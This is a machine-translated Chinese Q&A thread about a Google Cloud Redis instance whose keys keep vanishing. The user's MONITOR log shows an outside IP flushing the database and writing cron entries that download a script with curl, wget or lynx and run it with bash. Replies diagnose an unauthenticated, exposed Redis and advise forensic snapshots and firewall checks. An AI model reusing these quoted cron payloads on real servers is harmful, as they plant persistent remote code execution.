谷歌云计算引擎redis自动密钥删除_Redis_Google Compute Engine

谷歌云计算引擎redis自动密钥删除

redis google-compute-engine

谷歌云计算引擎redis自动密钥删除,redis,google-compute-engine,Redis,Google Compute Engine,嗨，发生了一个奇怪的事情。我有一个运行Redis4的google云实例。问题是在一些随机小时或分钟内插入Redis数据/密钥后自动删除当我将redis cli与MONITOR命令一起使用时，我发现了以下内容： 1525399477.663192[0 122.114.179.53:47936]“信息” 1525399487.102961[0 122.114.179.53:55176]“命令” 1525399487.546006[0 122.114.179.53:55176]“flushall”

嗨，发生了一个奇怪的事情。我有一个运行Redis4的google云实例。问题是在一些随机小时或分钟内插入Redis数据/密钥后自动删除

当我将redis cli与MONITOR命令一起使用时，我发现了以下内容：

1525399477.663192[0 122.114.179.53:47936]“信息”

1525399487.102961[0 122.114.179.53:55176]“命令”

1525399487.546006[0 122.114.179.53:55176]“flushall”

1525399488.214514[0 122.114.179.53:55176]“设置”“备份1”“\t\n*/2****curl-s>.cmd&&bash.cmd\n\t”

1525399488.435296[0 122.114.179.53:55176]“设置”“备份2”“\t\n*/5****wget-O.cmd和&bash.cmd\n\t”

1525399488.661485[0 122.114.179.53:55176]“设置”“备份3”“\t\n*/10****lynx-源 /tmp.CG62KOYFtW>.cmd&&bash.cmd\n\t“

我不知道这个IP地址：122.114.179.53

谢谢

您的谷歌计算引擎实例似乎已被黑客攻击

我强烈建议您停止该操作，拍摄磁盘快照，并创建一个新实例，将受影响实例的快照作为辅助磁盘，以执行取证分析。

看起来您的Redis是开放的，没有密码。。。有人试图入侵你的服务器。这是一个非常新的实例，也是redis绑定到私有IP。他们是如何进入谷歌云私有IP网络列表的？请检查你的谷歌云平台防火墙规则，看看他们是否允许该流量。允许所有流量的原因是他们为什么有新的实例IP？还有他们是如何发现使用redis的实例的？